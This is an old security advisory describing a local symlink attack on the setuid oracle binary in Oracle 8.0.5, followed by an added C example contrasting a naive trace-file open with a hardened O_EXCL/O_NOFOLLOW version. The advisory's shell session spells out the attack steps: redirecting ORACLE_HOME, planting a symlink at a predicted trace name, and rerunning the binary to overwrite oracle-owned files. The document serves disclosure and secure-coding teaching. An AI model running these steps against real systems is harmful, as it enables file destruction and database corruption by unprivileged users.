From: Juan Manuel Pascual Escriba (paskplazasite.com)
Date: Thu Aug 02 2001 - 02:57:26 CDT

                          WWW.PLAZASITE.COM

                      System & Security Division

       Title: Vulnerability in oracle binary in Oracle 8.0.5

        Date: 11-12-2000

    Platform: Only tested in Linux, but can be "exported" to others.

      Impact: Any user can compromise any file owned by oracle (the database owner).

      Author: Juan Manuel Pascual (paskplazasite.com)

      Status: Vendor contacted on 18th July 2001

    PROBLEM SUMMARY:
        There is a write permission checking error in the oracle binary that
    can be used by local users to write to any file owned by oracle.

    IMPACT:
        Any user with local access can corrupt the database, overwrite
    oracle binaries, etc.

    SOLUTION:
        Chmod -s ;-)))).

    STATUS:
        Vendor was contacted.

    ----------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba paskplazasite.com

    Only for educational purposes. (Corrupting a database isn't an educational purpose!)

    [paskproves1 /tmp]$
    [paskproves1 /tmp]$ mkdir rdbms
    [paskproves1 /tmp]$ cd rdbms/
    [paskproves1 rdbms]$ mkdir log
    [paskproves1 rdbms]$ cd log
    [paskproves1 log]$
    [paskproves1 log]$ ls -alc
    total 8
    drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
    drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
    [paskproves1 log]$ export ORACLE_HOME=/tmp
    [paskproves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
    [paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
    [paskproves1 log]$ ls -alc
    total 12
    drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
    drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
    -rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc

    Upsssssssss a log owned by oracle with the structure ora_pid.trc
    I can create:
    [paskproves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
    [paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
    [paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
    [paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
    [paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
    .
    ..
    ...
    until the log is my link ... and I overwrite the binary. What about dbf files, and so on ....
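
The file-creation pattern behind the session above, next to a hardened form, as an added example that is not code from the advisory or from Oracle. It assumes the trace file is opened create-or-truncate with symlinks followed; the function names, the temporary directory and the "victim" file are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed model of the flawed behaviour: create or truncate, following symlinks. */
static int open_trace_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0640);
}

/* Hardened: the name must not exist yet and the last component is never followed. */
static int open_trace_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0640);
}

/* Constructed scenario: "victim" stands in for a file owned by the privileged
 * account and ora_24050.trc is a symlink planted at the predictable trace name.
 * Returns the victim's size after opener() runs, or -1 on a setup error. */
static long run_scenario(int (*opener)(const char *), int *fd_out) {
    char dir[] = "/tmp/trcdemoXXXXXX", victim[64], trc[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(trc, sizeof trc, "%s/ora_24050.trc", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("important data\n", f);               /* 15 bytes */
    fclose(f);
    if (symlink(victim, trc) != 0) return -1;

    *fd_out = opener(trc);
    if (*fd_out >= 0) {
        ssize_t n = write(*fd_out, "trace\n", 6); (void)n;
        close(*fd_out);
    }
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(trc); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    int fd_naive = 0, fd_safe = 0;
    long naive = run_scenario(open_trace_naive, &fd_naive);
    long safe = run_scenario(open_trace_safe, &fd_safe);
    printf("naive open: fd=%d, victim is now %ld bytes\n", fd_naive, naive);
    printf("safe open:  fd=%d, victim is still %ld bytes\n", fd_safe, safe);
    return 0;
}
```

A privileged program should also take its log directory from a fixed, trusted path rather than from an environment variable such as ORACLE_HOME.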